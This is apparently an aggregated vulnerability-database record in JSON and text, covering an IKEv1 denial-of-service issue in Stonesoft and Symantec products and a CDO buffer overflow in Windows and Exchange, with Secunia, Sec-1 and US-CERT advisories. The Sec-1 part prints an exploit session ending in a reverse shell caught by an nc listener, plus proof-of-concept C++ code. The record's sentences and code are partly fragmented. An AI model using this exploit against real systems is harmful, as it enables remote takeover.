                "availabilityImpact": "PARTIAL",
                "baseScore": 5.0,
                "confidentialityImpact": "NONE",
                "exploitabilityScore": 10.0,
                "id": "VHN-14880",
                "impactScore": 2.9,
                "integrityImpact": "NONE",
                "severity": "MEDIUM",
                "trust": 0.1,
                "vectorString": "AV:N/AC:L/AU:N/C:N/I:N/A:P",
                "version": "2.0"
              }
            ],
            "cvssV3": [],
            "severity": [
              {
                "author": "nvd@nist.gov",
                "id": "CVE-2005-3672",
                "trust": 1.0,
                "value": "MEDIUM"
              },
              {
                "author": "CARNEGIE MELLON",
                "id": "VU#226364",
                "trust": 0.8,
                "value": "16.54"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-200511-252",
                "trust": 0.6,
                "value": "MEDIUM"
              },
              {
                "author": "VULHUB",
                "id": "VHN-14880",
                "trust": 0.1,
                "value": "MEDIUM"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "CERT/CC",
            "id": "VU#226364"
          },
          {
            "db": "VULHUB",
            "id": "VHN-14880"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-200511-252"
          },
          {
            "db": "NVD",
            "id": "CVE-2005-3672"
          }
        ]
      },
      "description": {
        "_id": null,
        "data": "The Internet Key Exchange version 1 (IKEv1) implementation in Stonesoft StoneGate Firewall before 2.6.1 allows remote attackers to cause a denial of service via certain crafted IKE packets, as demonstrated by the PROTOS ISAKMP Test Suite for IKEv1.  NOTE: due to the lack of details in the Stonesoft advisory, it is unclear which of CVE-2005-3666, CVE-2005-3667, and/or CVE-2005-3668 this issue applies to. Numerous vulnerabilities have been reported in various Internet Key Exchange version 1 (IKEv1) implementations. The impacts of these vulnerabilities may allow an attacker to execute arbitrary code, cause a denial-of-service condition, or cause an IKEv1 implementation to behave in an unstable/unpredictable manner. Stonesoft StoneGate Firewall and VPN Client are prone to multiple unspecified vulnerabilities in its IKEv1 implementation.  Potential issues include denial of service attacks, format strings, and buffer overflows. \nThese issues were discovered with the PROTOS ISAKMP Test Suite and are related to handling of malformed IKEv1 traffic. Stonesoft StoneGate Firewall is a firewall. \n\nTITLE:\nSymantec Firewall/VPN/Gateway ISAKMP Message Processing Denial of\nService\n\nSECUNIA ADVISORY ID:\nSA17684\n\nVERIFY ADVISORY:\nhttp://secunia.com/advisories/17684/\n\nCRITICAL:\nModerately critical\n\nIMPACT:\nDoS\n\nWHERE:\n\u003eFrom remote\n\nOPERATING SYSTEM:\nSymantec Gateway Security 400 Series\nhttp://secunia.com/product/6175/\nSymantec Gateway Security 300 Series\nhttp://secunia.com/product/6176/\nSymantec Gateway Security 3.x\nhttp://secunia.com/product/6177/\nSymantec Gateway Security 2.x\nhttp://secunia.com/product/3104/\nSymantec Gateway Security 1.x\nhttp://secunia.com/product/876/\nSymantec Firewall/VPN Appliance 100/200/200R\nhttp://secunia.com/product/552/\n\nSOFTWARE:\nSymantec Enterprise Firewall (SEF) 8.x\nhttp://secunia.com/product/3587/\n\nDESCRIPTION:\nSymantec has acknowledged a vulnerability in various Symantec\nproducts, which can be exploited by malicious people to cause a DoS\n(Denial of Service). \n\nFor more information:\nSA17553\n\nSuccessful exploitation causes a DoS of the dynamic VPN services. \n\nThe vulnerability has been reported in the following products. \n* Symantec Enterprise Firewall version 8.0 (Windows)\n* Symantec Enterprise Firewall version 8.0 (Solaris)\n* Symantec Gateway Security 5000 Series version 3.0\n* Symantec Gateway Security 5400 version 2.0.1\n* Symantec Gateway Security 5310 version 1.0\n* Symantec Gateway Security 5200/5300 version 1.0\n* Symantec Gateway Security 5100\n* Symantec Gateway Security 400 version 2.0\n* Symantec Gateway Security 300\tversion 2.0\n* Symantec Firewall /VPN Appliance 200/200R\n* Symantec Firewall /VPN Appliance 100\n\nSOLUTION:\nApply hotfixes. \n\nSymantec Enterprise Firewall version 8.0 (Windows):\nApply SEF8.0-20051114-00. \nhttp://www.symantec.com/techsupp/enterprise/products/sym_ent_firewall/sym_ent_fw_8/files.html\n\nSymantec Enterprise Firewall version 8.0 (Solaris):\nApply SEF8.0-20051114-00. \nhttp://www.symantec.com/techsupp/enterprise/products/sym_ent_firewall/sym_ent_fw_8_sol/files.html\n\nSymantec Gateway Security 5000 Series version 3.0:\nApply SGS3.0-2005114-02. \nhttp://www.symantec.com/techsupp/enterprise/products/sym_gateway_security/sgs_5600_3/files.html\n\nSymantec Gateway Security 5400 version 2.0.1:\nApply SGS2.0.1-20051114-00. \nhttp://www.symantec.com/techsupp/enterprise/products/sym_gateway_security/sym_gw_security_201_5400/files.html\n\nSymantec Gateway Security 5310 version 1.0:\nApply SG7004-20051114-00. \nhttp://www.symantec.com/techsupp/enterprise/products/sym_gateway_security/sym_gw_security_1_5310/files.html\n\nSymantec Gateway Security 5200/5300 version 1.0:\nApply SG7004-20051114-00. \nhttp://www.symantec.com/techsupp/enterprise/products/sym_gateway_security/sym_gw_security_1_52005300/files.html\n\nSymantec Gateway Security 5100:\nApply SG7004-20051114-00. \nhttp://www.symantec.com/techsupp/enterprise/products/sym_gateway_security/sym_gw_security_1_5110/files.html\n\nSymantec Gateway Security 400 version 2.0:\nUpdate to build 1103. \nhttp://www.symantec.com/techsupp/enterprise/products/sym_gateway_security/sgs_2_400/files.html\n\nSymantec Gateway Security 300 version 2.0:\nUpdate to build 1103. \nhttp://www.symantec.com/techsupp/enterprise/products/sym_gateway_security/sgs_300s_2/files.html\n\nSymantec Firewall /VPN Appliance 200/200R:\nUpdate to build 1.8F. \nhttp://www.symantec.com/techsupp/enterprise/products/sym_fw_vpn_appliance/sym_fw_vpn_appliance_200r/files.html\n\nSymantec Firewall /VPN Appliance 100:\nUpdate to build 1.8F. \nhttp://www.symantec.com/techsupp/enterprise/products/sym_fw_vpn_appliance/sym_fw_vpn_appliance_100/files.html\n\nORIGINAL ADVISORY:\nSymantec:\nhttp://securityresponse.symantec.com/avcenter/security/Content/2005.11.21.html\n\nOTHER REFERENCES:\nSA17553:\nhttp://secunia.com/advisories/17553/\n\n----------------------------------------------------------------------\n\nAbout:\nThis Advisory was delivered by Secunia as a free service to help\neverybody keeping their systems up to date against the latest\nvulnerabilities. \n\nSubscribe:\nhttp://secunia.com/secunia_security_advisories/\n\nDefinitions: (Criticality, Where etc.)\nhttp://secunia.com/about_secunia_advisories/\n\n\nPlease Note:\nSecunia recommends that you verify all advisories you receive by\nclicking the link. \nSecunia NEVER sends attached files with advisories. \nSecunia does not advise people to install third party patches, only\nuse those supplied by the vendor. \n\n----------------------------------------------------------------------\n\nUnsubscribe: Secunia Security Advisories\nhttp://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org\n\n----------------------------------------------------------------------\n\n\n",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2005-3672"
          },
          {
            "db": "CERT/CC",
            "id": "VU#226364"
          },
          {
            "db": "BID",
            "id": "15405"
          },
          {
            "db": "VULHUB",
            "id": "VHN-14880"
          },
          {
            "db": "PACKETSTORM",
            "id": "41734"
          }
        ],
        "trust": 2.07
      },
      "exploit_availability": {
        "_id": null,
        "data": [
          {
            "reference": "https://www.scap.org.cn/vuln/vhn-14880",
            "trust": 0.1,
            "type": "unknown"
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-14880"
          }
        ]
      },
      "external_ids": {
        "_id": null,
        "data": [
          {
            "db": "CERT/CC",
            "id": "VU#226364",
            "trust": 2.5
          },
          {
            "db": "NVD",
            "id": "CVE-2005-3672",
            "trust": 2.0
          },
          {
            "db": "BID",
            "id": "15405",
            "trust": 2.0
          },
          {
            "db": "SECUNIA",
            "id": "17566",
            "trust": 1.7
          },
          {
            "db": "VUPEN",
            "id": "ADV-2005-2408",
            "trust": 1.7
          },
          {
            "db": "SECUNIA",
            "id": "17684",
            "trust": 0.9
          },
          {
            "db": "SECUNIA",
            "id": "17621",
            "trust": 0.8
          },
          {
            "db": "SECUNIA",
            "id": "17663",
            "trust": 0.8
          },
          {
            "db": "SECUNIA",
            "id": "17838",
            "trust": 0.8
          },
          {
            "db": "SECUNIA",
            "id": "17553",
            "trust": 0.8
          },
          {
            "db": "SECUNIA",
            "id": "17608",
            "trust": 0.8
          },
          {
            "db": "SECUNIA",
            "id": "17668",
            "trust": 0.8
          },
          {
            "db": "AUSCERT",
            "id": "ESB-2005.0924",
            "trust": 0.8
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-200511-252",
            "trust": 0.7
          },
          {
            "db": "VULHUB",
            "id": "VHN-14880",
            "trust": 0.1
          },
          {
            "db": "PACKETSTORM",
            "id": "41734",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "CERT/CC",
            "id": "VU#226364"
          },
          {
            "db": "VULHUB",
            "id": "VHN-14880"
          },
          {
            "db": "BID",
            "id": "15405"
          },
          {
            "db": "PACKETSTORM",
            "id": "41734"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-200511-252"
          },
          {
            "db": "NVD",
            "id": "CVE-2005-3672"
          }
        ]
      },
      "id": "VAR-200511-0018",
      "iot": {
        "_id": null,
        "data": true,
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-14880"
          }
        ],
        "trust": 0.01
      },
      "last_update_date": "2026-04-10T22:30:02.285000Z",
      "problemtype_data": {
        "_id": null,
        "data": [
          {
            "problemtype": "NVD-CWE-Other",
            "trust": 1.0
          }
        ],
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2005-3672"
          }
        ]
      },
      "references": {
        "_id": null,
        "data": [
          {
            "trust": 2.8,
            "url": "http://www.niscc.gov.uk/niscc/docs/re-20051114-01014.pdf?lang=en"
          },
          {
            "trust": 2.5,
            "url": "http://jvn.jp/niscc/niscc-273756/index.html"
          },
          {
            "trust": 2.0,
            "url": "http://www.stonesoft.com/support/security_advisories/7244.html"
          },
          {
            "trust": 1.7,
            "url": "http://www.securityfocus.com/bid/15405"
          },
          {
            "trust": 1.7,
            "url": "http://www.kb.cert.org/vuls/id/226364"
          },
          {
            "trust": 1.7,
            "url": "http://www.ee.oulu.fi/research/ouspg/protos/testing/c09/isakmp/"
          },
          {
            "trust": 1.7,
            "url": "http://secunia.com/advisories/17566"
          },
          {
            "trust": 1.1,
            "url": "http://www.vupen.com/english/advisories/2005/2408"
          },
          {
            "trust": 0.9,
            "url": "http://secunia.com/advisories/17553/"
          },
          {
            "trust": 0.9,
            "url": "http://secunia.com/advisories/17684/"
          },
          {
            "trust": 0.8,
            "url": "http://www.ee.oulu.fi/research/ouspg/protos/testing/c09/isakmp"
          },
          {
            "trust": 0.8,
            "url": "http://www.ficora.fi/suomi/tietoturva/varoitukset/varoitus-2005-82.htm"
          },
          {
            "trust": 0.8,
            "url": "http://www.auscert.org.au/5748"
          },
          {
            "trust": 0.8,
            "url": "http://secunia.com/advisories/17608/"
          },
          {
            "trust": 0.8,
            "url": "http://secunia.com/advisories/17621/"
          },
          {
            "trust": 0.8,
            "url": "http://secunia.com/advisories/17668/"
          },
          {
            "trust": 0.8,
            "url": "http://secunia.com/advisories/17663/"
          },
          {
            "trust": 0.8,
            "url": "http://secunia.com/advisories/17838/"
          },
          {
            "trust": 0.6,
            "url": "http://www.frsirt.com/english/advisories/2005/2408"
          },
          {
            "trust": 0.1,
            "url": "http://www.symantec.com/techsupp/enterprise/products/sym_ent_firewall/sym_ent_fw_8_sol/files.html"
          },
          {
            "trust": 0.1,
            "url": "http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org"
          },
          {
            "trust": 0.1,
            "url": "http://secunia.com/product/3104/"
          },
          {
            "trust": 0.1,
            "url": "http://www.symantec.com/techsupp/enterprise/products/sym_fw_vpn_appliance/sym_fw_vpn_appliance_200r/files.html"
          },
          {
            "trust": 0.1,
            "url": "http://secunia.com/product/6177/"
          },
          {
            "trust": 0.1,
            "url": "http://www.symantec.com/techsupp/enterprise/products/sym_fw_vpn_appliance/sym_fw_vpn_appliance_100/files.html"
          },
          {
            "trust": 0.1,
            "url": "http://www.symantec.com/techsupp/enterprise/products/sym_ent_firewall/sym_ent_fw_8/files.html"
          },
          {
            "trust": 0.1,
            "url": "http://secunia.com/product/3587/"
          },
          {
            "trust": 0.1,
            "url": "http://www.symantec.com/techsupp/enterprise/products/sym_gateway_security/sym_gw_security_1_5310/files.html"
          },
          {
            "trust": 0.1,
            "url": "http://www.symantec.com/techsupp/enterprise/products/sym_gateway_security/sym_gw_security_1_5110/files.html"
          },
          {
            "trust": 0.1,
            "url": "http://secunia.com/about_secunia_advisories/"
          },
          {
            "trust": 0.1,
            "url": "http://secunia.com/product/6175/"
          },
          {
            "trust": 0.1,
            "url": "http://secunia.com/product/6176/"
          },
          {
            "trust": 0.1,
            "url": "http://secunia.com/product/552/"
          },
          {
            "trust": 0.1,
            "url": "http://securityresponse.symantec.com/avcenter/security/content/2005.11.21.html"
          },
          {
            "trust": 0.1,
            "url": "http://www.symantec.com/techsupp/enterprise/products/sym_gateway_security/sgs_300s_2/files.html"
          },
          {
            "trust": 0.1,
            "url": "http://secunia.com/product/876/"
          },
          {
            "trust": 0.1,
            "url": "http://secunia.com/secunia_security_advisories/"
          },
          {
            "trust": 0.1,
            "url": "http://www.symantec.com/techsupp/enterprise/products/sym_gateway_security/sgs_5600_3/files.html"
          },
          {
            "trust": 0.1,
            "url": "http://www.symantec.com/techsupp/enterprise/products/sym_gateway_security/sgs_2_400/files.html"
          },
          {
            "trust": 0.1,
            "url": "http://www.symantec.com/techsupp/enterprise/products/sym_gateway_security/sym_gw_security_1_52005300/files.html"
          },
          {
            "trust": 0.1,
            "url": "http://www.symantec.com/techsupp/enterprise/products/sym_gateway_security/sym_gw_security_201_5400/files.html"
          }
        ],
        "sources": [
          {
            "db": "CERT/CC",
            "id": "VU#226364"
          },
          {
            "db": "VULHUB",
            "id": "VHN-14880"
          },
          {
            "db": "BID",
            "id": "15405"
          },
          {
            "db": "PACKETSTORM",
            "id": "41734"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-200511-252"
          },
          {
            "db": "NVD",
            "id": "CVE-2005-3672"
          }
        ]
      },
      "sources": {
        "_id": null,
        "data": [
          {
            "db": "CERT/CC",
            "id": "VU#226364",
            "ident": null
          },
          {
            "db": "VULHUB",
            "id": "VHN-14880",
            "ident": null
          },
          {
            "db": "BID",
            "id": "15405",
            "ident": null
          },
          {
            "db": "PACKETSTORM",
            "id": "41734",
            "ident": null
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-200511-252",
            "ident": null
          },
          {
            "db": "NVD",
            "id": "CVE-2005-3672",
            "ident": null
          }
        ]
      },
      "sources_release_date": {
        "_id": null,
        "data": [
          {
            "date": "2005-11-17T00:00:00",
            "db": "CERT/CC",
            "id": "VU#226364",
            "ident": null
          },
          {
            "date": "2005-11-18T00:00:00",
            "db": "VULHUB",
            "id": "VHN-14880",
            "ident": null
          },
          {
            "date": "2005-11-14T00:00:00",
            "db": "BID",
            "id": "15405",
            "ident": null
          },
          {
            "date": "2005-11-22T18:19:46",
            "db": "PACKETSTORM",
            "id": "41734",
            "ident": null
          },
          {
            "date": "2005-11-18T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-200511-252",
            "ident": null
          },
          {
            "date": "2005-11-18T21:03:00",
            "db": "NVD",
            "id": "CVE-2005-3672",
            "ident": null
          }
        ]
      },
      "sources_update_date": {
        "_id": null,
        "data": [
          {
            "date": "2006-01-03T00:00:00",
            "db": "CERT/CC",
            "id": "VU#226364",
            "ident": null
          },
          {
            "date": "2011-03-08T00:00:00",
            "db": "VULHUB",
            "id": "VHN-14880",
            "ident": null
          },
          {
            "date": "2005-11-14T00:00:00",
            "db": "BID",
            "id": "15405",
            "ident": null
          },
          {
            "date": "2005-12-05T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-200511-252",
            "ident": null
          },
          {
            "date": "2025-04-03T01:03:51.193000",
            "db": "NVD",
            "id": "CVE-2005-3672",
            "ident": null
          }
        ]
      },
      "threat_type": {
        "_id": null,
        "data": "remote",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-200511-252"
          }
        ],
        "trust": 0.6
      },
      "title": {
        "_id": null,
        "data": "Multiple vulnerabilities in Internet Key Exchange (IKE) version 1 implementations",
        "sources": [
          {
            "db": "CERT/CC",
            "id": "VU#226364"
          }
        ],
        "trust": 0.8
      },
      "type": {
        "_id": null,
        "data": "lack of information",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-200511-252"
          }
        ],
        "trust": 0.6
      }
    }

    VAR-200510-0005

    Vulnerability from variot - Updated: 2026-04-10 22:24

    Buffer overflow in Collaboration Data Objects (CDO), as used in Microsoft Windows and Microsoft Exchange Server, allows remote attackers to execute arbitrary code when CDOSYS or CDOEX processes an e-mail message with a large header name, as demonstrated using the "Content-Type" string. Microsoft Internet Explorer (IE) will attempt to use COM objects that were not intended to be used in the web browser. This can cause a variety of impacts, such as causing IE to crash. Microsoft DDS Library Shape Control COM object contains an unspecified vulnerability, which may allow a remote attacker to execute arbitrary code on a vulnerable system. This issue is due to a failure of the library to properly bounds check user-supplied data prior to copying it to an insufficiently sized memory buffer. This issue presents itself when an attacker sends a specifically crafted email message to an email server utilizing the affected library.

    The vulnerability has been reported in the following versions: * Windows 2000 (remote code execution) * Windows XP Service Pack 1 (remote code execution) * Windows XP Service Pack 2 (local privilege escalation) * Windows Server 2003 (local privilege escalation) * Windows Server 2003 Service Pack 1 (local privilege escalation)

    3) An error in the MSDTC when validating TIP (Transaction Internet Protocol) requests can be exploited to cause the service to stop responding via a specially crafted network message. The malicious TIP message can be transferred through the affected system to another, which causes the MSDTC on both systems to stop responding.

    Successful exploitation requires that the TIP protocol is enabled for MSDTC.

    SOLUTION: Apply patches.

    Subscribe: http://secunia.com/secunia_security_advisories/

    Definitions: (Criticality, Where etc.) http://secunia.com/about_secunia_advisories/

    Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor.


    Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org


    . SEC-1 LTD. The vulnerability exists when event sinks are used within Microsoft Exchange 2000 or Microsoft Mail services to parse e-mail content. Several Content Security packages were identified to be vulnerable/exploitable.

    The vulnerability can be exploited by crafting an e-mail with a large header name such as "Content-Type:". A failure to correctly determine the length of the string results in a stack overflow. Under certain conditions the vulnerability can also be used to bypass content security mechanisms such as virus and content security scanners. Proof of concept code to recreate the problem is included at the bottom of this advisory.

    Exploit Availability:

    Sec-1 do not release exploit code to the general public. Attendees of the Sec-1 Applied Hacking & Intrusion prevention course will receive a copy of this exploit as part of the Sec-1 Exploit Arsenal. See: http://www.sec-1.com/applied_hacking_course.html

    Exploit Example:

    [root@homer PoC]# perl cdo.pl -f me@test.com -t me@test.com -h 10.0.0.53

    Enter IP address of your attacking host: 10.0.0.200 Enter Port for shellcode to connect back on: 80

    []----Connected OK! []----Sending MAIL FROM: me@test.com []----Sending RCPT TO: me@test.com []----Sending Malformed E-mail body []----Shellcode Length: 316 []----Shellcode type: Reverse shell [*]----Done.

    [!] Note this may take a while. Inetinfo will crash and restart This will happen until a nops are reached. You may also want to clear the queue to restore Inetinfo.exe by deleting malformed

    e-mail from c:\Inetpub\mailroot\Queue
    

    [root@homer PoC]# nc -l -p 80 -v listening on [any] 80 ...

    10.0.0.53: inverse host lookup failed: Unknown host connect to [10.0.0.200] from (UNKNOWN) [10.0.0.53] 1100 Microsoft Windows 2000 [Version 5.00.2195] (C) Copyright 1985-2000 Microsoft Corp.

    C:\WINNT\system32>c:\whoami NT AUTHORITY\SYSTEM

    C:\WINNT\system32>

    Vendor Response:

    Microsoft have released the following information including a fix, http://www.microsoft.com/technet/security/bulletin/MS05-048.mspx

    Common Vulnerabilities and Exposures (CVE) Information:

    The Common Vulnerabilities and Exposures (CVE) project has assigned the following names to these issues. These are candidates for inclusion in the CVE list (http://cve.mitre.org), which standardizes names for security problems.

        CAN-2005-1987
    

    Demonstration:

    The following CDO code demonstrates the problem.

    Step 1.

    Create an E-mail named vuln.eml including a large "Content-Type:" header.

    Step 2.

    // Compile with -GX option

    import no_namespace rename("EOF", "adoEOF")

    import rename_namespace("CDO")

    include

    int main() {

    CoInitialize(0); try { CDO::IMessagePtr spMsg(__uuidof(CDO::Message)); _StreamPtr spStream(spMsg->GetStream()); spStream->Position = 0; spStream->Type = adTypeBinary; spStream->LoadFromFile("vuln.eml"); spStream->Flush();

    for(long i = 1; i <= spMsg->BodyPart->BodyParts->Count; i++) { CDO::IBodyPartPtr spBdy = spMsg->BodyPart->BodyParts->Item[i]; _variant_t v = spBdy->Fields->Item["urn:schemas:mailheader:Content-Type"]->Value; }

    } catch(_com_error &e) { printf("COM error[0x%X, %s]\n", e.Error(), (LPCTSTR)e.Description()); } catch(...) { printf("General exception\n"); }

    CoUninitialize();
    
    return 0;
    

    }

    CDO::IBodyPartPtr spBdy = spMsg->BodyPart->BodyParts->Item[i];
    _variant_t v =
    

    spBdy->Fields->Item["urn:schemas:mailheader:Content-Type"]->Value;

    Copyright 2005 Sec-1 LTD. All rights reserved.


    NEW: Sec-1 Hacking Training - Learn to breach network security to further your knowledge and protect your network http://www.sec-1.com/applied_hacking_course.html


    . -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1

            Technical Cyber Security Alert TA05-284A
    

    Microsoft Windows, Internet Explorer, and Exchange Server Vulnerabilities

    Original release date: October 11, 2005 Last revised: -- Source: US-CERT

    Systems Affected

     * Microsoft Windows
     * Microsoft Internet Explorer
     * Microsoft Exchange Server
    

    For more complete information, refer to the Microsoft Security Bulletin Summary for October 2005.

    Overview

    Microsoft has released updates that address critical vulnerabilities in Windows, Internet Explorer, and Exchange Server.

    I. Description

    Microsoft Security Bulletins for October 2005 address vulnerabilities in Windows and Internet Explorer. Further information is available in the following US-CERT Vulnerability Notes:

    VU#214572 - Microsoft Plug and Play fails to properly validate user supplied data

    Microsoft Plug and Play contains a flaw in the handling of message buffers that may result in local or remote arbitrary code execution or denial-of-service conditions. (CAN-2005-1987)

    VU#922708 - Microsoft Windows Shell fails to handle shortcut files properly

    Microsoft Windows Shell does not properly handle some shortcut files and may permit arbitrary code execution when a specially-crafted file is opened. (CAN-2005-0163)

    II. An attacker may also be able to cause a denial of service.

    III. Solution

    Apply Updates

    Microsoft has provided the updates for these vulnerabilities in the Security Bulletins and on the Microsoft Update site.

    Workarounds

    Please see the following US-CERT Vulnerability Notes for workarounds.

    Appendix A. References

     * Microsoft Security Bulletin Summary for October 2005 -
       <http://www.microsoft.com/technet/security/bulletin/ms05-oct.mspx>
    
     * US-CERT Vulnerability Note VU#214572 -
       <http://www.kb.cert.org/vuls/id/214572>
    
     * US-CERT Vulnerability Note VU#883460 -
       <http://www.kb.cert.org/vuls/id/883460>
    
     * US-CERT Vulnerability Note VU#922708 -
       <http://www.kb.cert.org/vuls/id/922708>
    
     * US-CERT Vulnerability Note VU#995220 -
       <http://www.kb.cert.org/vuls/id/995220>
    
     * US-CERT Vulnerability Note VU#180868 -
       <http://www.kb.cert.org/vuls/id/180868>
    
     * US-CERT Vulnerability Note VU#950516 -
       <http://www.kb.cert.org/vuls/id/950516>
    
     * US-CERT Vulnerability Note VU#959049 -
       <http://www.kb.cert.org/vuls/id/959049>
    
     * US-CERT Vulnerability Note VU#680526 -
       <http://www.kb.cert.org/vuls/id/680526>
    
     * CAN-2005-2120 -
       <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-2120>
    
     * CAN-2005-1987 -
       <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-1987>
    
     * CAN-2005-2122 -
       <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-2122>
    
     * CAN-2005-2128 -
       <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-2128>
    
     * CAN-2005-2119 -
       <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-2119>
    
     * CAN-2005-1978 -
       <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-1978>
    
     * CAN-2005-2127 -
       <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-2127>
    
     * CAN-2005-0163 -
       <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-0163>
    
     * Microsoft Update - <https://update.microsoft.com/microsoftupdate>
    

    The most recent version of this document can be found at:

    http://www.us-cert.gov/cas/techalerts/TA05-284A.html


    Feedback can be directed to US-CERT. Please send email to: cert@cert.org with "TA05-284A Feedback VU#959049" in the subject.


    Revision History

    Oct 11, 2004: Initial release


    Produced 2005 by US-CERT, a government organization.

    Terms of use

    http://www.us-cert.gov/legal.html


    For instructions on subscribing to or unsubscribing from this mailing list, visit http://www.us-cert.gov/cas/.

    -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.2.1 (GNU/Linux)

    iQEVAwUBQ0xBVn0pj593lg50AQJvOQf/QqIy3putm/wkUAUguQaylsCfC38Lysdc bqbtj7oF6HEoCzhQguaqQdMGOqa4QJnrObnkHN29xFhYovKWOIYkYsh6c3IXaNLK PdImVbcMFNn9VsBNNRVr2dqPXJPvgFFzQKsDcKkknnZyxLf5mshwDJoKFsKDGr9c 1P9yxwyagQ8G73gTq6hPV/Wl/6zElXH/chlh6haXe6XN9ArTmz8A3OCAN+BZQUqe /9T4US8oxLeLlNDcQc/PV5v3VuXXW0v9kjEjqAVEH5tRKH/oIkVdgpj7gdrAzDjM MUojHfl1v2/JwWubQ9DFQsBx4Jxv5YvJEREsU7RbVJotn02+Yaaeog== =5hXu -----END PGP SIGNATURE-----

    Show details on source website

    {
      "affected_products": {
        "_id": null,
        "data": [
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 4.8,
            "vendor": "microsoft",
            "version": null
          },
          {
            "_id": null,
            "model": "exchange server",
            "scope": "eq",
            "trust": 2.7,
            "vendor": "microsoft",
            "version": "2000"
          },
          {
            "_id": null,
            "model": "windows server 2003",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "microsoft",
            "version": null
          },
          {
            "_id": null,
            "model": "windows 2000",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "microsoft",
            "version": null
          },
          {
            "_id": null,
            "model": "windows server 2003",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "microsoft",
            "version": "r2"
          },
          {
            "_id": null,
            "model": "windows xp",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "microsoft",
            "version": null
          },
          {
            "_id": null,
            "model": "windows server 2003",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "microsoft",
            "version": "sp1"
          },
          {
            "_id": null,
            "model": "windows 2000",
            "scope": null,
            "trust": 0.8,
            "vendor": "microsoft",
            "version": null
          },
          {
            "_id": null,
            "model": "windows server 2003",
            "scope": null,
            "trust": 0.8,
            "vendor": "microsoft",
            "version": null
          },
          {
            "_id": null,
            "model": "windows xp",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "microsoft",
            "version": "sp3"
          },
          {
            "_id": null,
            "model": "windows 2003 server",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "microsoft",
            "version": "itanium"
          },
          {
            "_id": null,
            "model": "windows xp",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "microsoft",
            "version": "64-bit"
          },
          {
            "_id": null,
            "model": "windows 2003 server",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "microsoft",
            "version": "sp1"
          },
          {
            "_id": null,
            "model": "windows 2003 server",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "microsoft",
            "version": "r2"
          },
          {
            "_id": null,
            "model": "windows 2000",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "microsoft",
            "version": "sp4"
          },
          {
            "_id": null,
            "model": "windows xp",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "microsoft",
            "version": "sp2"
          },
          {
            "_id": null,
            "model": "windows xp",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "microsoft",
            "version": "sp1"
          },
          {
            "_id": null,
            "model": "windows 2003 server",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "microsoft",
            "version": "64-bit"
          },
          {
            "_id": null,
            "model": "networks centrex ip element manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "8.0"
          },
          {
            "_id": null,
            "model": "networks centrex ip element manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "7.0"
          },
          {
            "_id": null,
            "model": "networks centrex ip element manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "2.5"
          },
          {
            "_id": null,
            "model": "networks centrex ip client manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "8.0"
          },
          {
            "_id": null,
            "model": "networks centrex ip client manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "7.0"
          },
          {
            "_id": null,
            "model": "networks centrex ip client manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "2.5"
          },
          {
            "_id": null,
            "model": "networks centrex ip client manager",
            "scope": null,
            "trust": 0.3,
            "vendor": "nortel",
            "version": null
          },
          {
            "_id": null,
            "model": "windows xp professional edition",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "microsoft",
            "version": "x64"
          },
          {
            "_id": null,
            "model": "windows xp professional sp2",
            "scope": null,
            "trust": 0.3,
            "vendor": "microsoft",
            "version": null
          },
          {
            "_id": null,
            "model": "windows xp professional sp1",
            "scope": null,
            "trust": 0.3,
            "vendor": "microsoft",
            "version": null
          },
          {
            "_id": null,
            "model": "windows xp professional",
            "scope": null,
            "trust": 0.3,
            "vendor": "microsoft",
            "version": null
          },
          {
            "_id": null,
            "model": "windows xp media center edition sp2",
